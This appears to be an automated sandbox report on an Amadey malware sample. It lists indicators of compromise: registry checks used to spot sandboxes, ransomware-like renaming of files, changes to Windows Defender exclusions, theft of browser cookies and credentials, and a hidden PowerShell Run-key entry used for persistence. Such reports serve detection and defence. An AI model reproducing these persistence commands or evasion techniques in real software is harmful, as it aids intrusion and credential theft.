amadey | d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Renames multiple (8951) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
8868	powershell.exe
12604	powershell.exe
9224	powershell.exe
4184	powershell.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 12 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
5108	chrome.exe
5960	chrome.exe
7676	chrome.exe
11232	msedge.exe
12520	chrome.exe
10080	chrome.exe
3612	msedge.exe
112	msedge.exe
5724	msedge.exe
5748	chrome.exe
5740	chrome.exe
8148	chrome.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	BlueMail.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aswin.vbs	BlueMail.exe

Executes dropped EXE 18 IoCs

pid	Process
4720	skotes.exe
908	LoaderHRC.exe
3928	LoaderHRC.exe
1216	skotes.exe
1496	4ZD5C3i.exe
7432	Loader.exe
10120	Loader.exe
9176	BlueMail.exe
12672	BlueMail.exe
6668	Gxtuum.exe
4496	skotes.exe
11048	Gxtuum.exe
5676	59f1d398b7.exe
4072	Gxtuum.exe
10992	Gxtuum.exe
6236	skotes.exe
10604	Gxtuum.exe
3648	ad8fa0c081.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Wine	skotes.exe

Loads dropped DLL 64 IoCs

pid	Process
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe
10120	Loader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\JBwOxmLVtiEKlhS.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\nhJNWaKQfkqMOFZ.ps1\""	powershell.exe

Drops desktop.ini file(s) 16 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Pictures\desktop.ini	Loader.exe
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Desktop\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Videos\desktop.ini	Loader.exe
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Music\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Pictures\Camera Roll\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Documents\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Downloads\desktop.ini	Loader.exe
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Pictures\Saved Pictures\desktop.ini	Loader.exe
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Downloads\desktop.ini	Loader.exe
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Pictures\Camera Roll\desktop.ini	Loader.exe
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Videos\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Music\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Pictures\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Pictures\Saved Pictures\desktop.ini	Loader.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Desktop\desktop.ini	Loader.exe
File created	C:\Users\Admin\AppData\Local\Temp\FileRetriever_Prysmax\Documents\desktop.ini	Loader.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	4ZD5C3i.exe
File opened (read-only)	\??\Z:	4ZD5C3i.exe

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
336	api.ipify.org
337	api.ipify.org
638	api.ipify.org
642	api.ipify.org
645	api.ipify.org
646	api.ipify.org
354	api.ipify.org
616	api.ipify.org
622	api.ipify.org
623	api.ipify.org
635	api.ipify.org

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
10468	tasklist.exe
8744	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
468	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
4720	skotes.exe
1216	skotes.exe
3928	LoaderHRC.exe
10120	Loader.exe
4496	skotes.exe
6236	skotes.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 9176 set thread context of 12672	9176	BlueMail.exe	287
PID 6668 set thread context of 4072	6668	Gxtuum.exe	292
PID 11048 set thread context of 10992	11048	Gxtuum.exe	293

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-math-l1-1-0.dll	4ZD5C3i.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Runtime.Intrinsics.dll	4ZD5C3i.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif	4ZD5C3i.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it\WindowsFormsIntegration.resources.dll	4ZD5C3i.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions.png	4ZD5C3i.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-100.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\TelemetryDashboard.xltx	4ZD5C3i.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-localization-l1-2-0.dll	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.2.2_2.2.27405.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteshare.exe	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription2-ul-oob.xrm-ms	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-40.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\LoanAmortization.xltx	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-40_altform-lightunplated.png	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\sr-latn-cs\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_sv.properties	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.Advertising.dll	4ZD5C3i.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\README.TXT	4ZD5C3i.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-125.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-16.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\snooze.contrast-white.png	4ZD5C3i.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\ui-strings.js	4ZD5C3i.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailBadge.scale-400.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\FRSCRIPT.TTF	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OMICAUT.DLL	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.2.2_2.2.27405.0_x64__8wekyb3d8bbwe\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-BOLD.TTF	4ZD5C3i.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru\WindowsFormsIntegration.resources.dll	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.2.2_2.2.27328.0_x64__8wekyb3d8bbwe\logo.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\resources.pri	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\microsoft.system.package.metadata\README.TXT	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-140.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\RADIAL.INF	4ZD5C3i.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js	4ZD5C3i.exe
File created	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\README.TXT	4ZD5C3i.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\README.TXT	4ZD5C3i.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Dark.scale-200.png	4ZD5C3i.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png	4ZD5C3i.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png	4ZD5C3i.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\README.TXT	4ZD5C3i.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-pl.xrm-ms	4ZD5C3i.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ppd.xrm-ms	4ZD5C3i.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\PresentationNative_cor3.dll	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v11.1.dll	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\README.TXT	4ZD5C3i.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Shell\README.TXT	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\Studio.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\vi-VN\View3d\3DViewerProductDescription-universal.xml	4ZD5C3i.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-white_scale-125.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsSmallTile.scale-100.png	4ZD5C3i.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Resources\RetailDemo\data\en-us\2.jpg	4ZD5C3i.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
File created	C:\Windows\Tasks\Gxtuum.job	BlueMail.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	59f1d398b7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ad8fa0c081.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueMail.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4ZD5C3i.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueMail.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 25 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
4156	ipconfig.exe
9576	ipconfig.exe
5624	ipconfig.exe
7220	ipconfig.exe
2456	ipconfig.exe
7092	ipconfig.exe
10312	ipconfig.exe
7404	ipconfig.exe
6700	ipconfig.exe
6584	ipconfig.exe
8084	ipconfig.exe
5292	ipconfig.exe
4808	ipconfig.exe
5168	ipconfig.exe
6952	ipconfig.exe
2036	ipconfig.exe
5872	ipconfig.exe
5844	ipconfig.exe
10272	ipconfig.exe
11044	ipconfig.exe
6920	ipconfig.exe
12976	ipconfig.exe
11016	ipconfig.exe
6204	ipconfig.exe
4112	ipconfig.exe

Gathers system information 1 TTPs 10 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
5752	systeminfo.exe
7064	systeminfo.exe
4588	systeminfo.exe
9944	systeminfo.exe
6240	systeminfo.exe
8576	systeminfo.exe
9020	systeminfo.exe
7160	systeminfo.exe
2760	systeminfo.exe
10260	systeminfo.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
12536	taskkill.exe
8536	taskkill.exe
11552	taskkill.exe
10344	taskkill.exe
10180	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133785832313625859"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
468	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
468	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
4720	skotes.exe
4720	skotes.exe
1216	skotes.exe
1216	skotes.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
3928	LoaderHRC.exe
5224	msedge.exe
5224	msedge.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
5108	chrome.exe
5108	chrome.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe
1496	4ZD5C3i.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
5108	chrome.exe
5108	chrome.exe
5108	chrome.exe
7676	chrome.exe
7676	chrome.exe
7676	chrome.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	3928	LoaderHRC.exe
Token: SeTakeOwnershipPrivilege	1496	4ZD5C3i.exe
Token: SeBackupPrivilege	4644	vssvc.exe
Token: SeRestorePrivilege	4644	vssvc.exe
Token: SeAuditPrivilege	4644	vssvc.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeDebugPrivilege	12536	taskkill.exe
Token: SeDebugPrivilege	10180	taskkill.exe
Token: SeShutdownPrivilege	5108	chrome.exe
Token: SeCreatePagefilePrivilege	5108	chrome.exe
Token: SeDebugPrivilege	8536	taskkill.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	8868	powershell.exe
Token: SeDebugPrivilege	10468	tasklist.exe
Token: SeDebugPrivilege	10120	Loader.exe
Token: SeDebugPrivilege	9176	BlueMail.exe
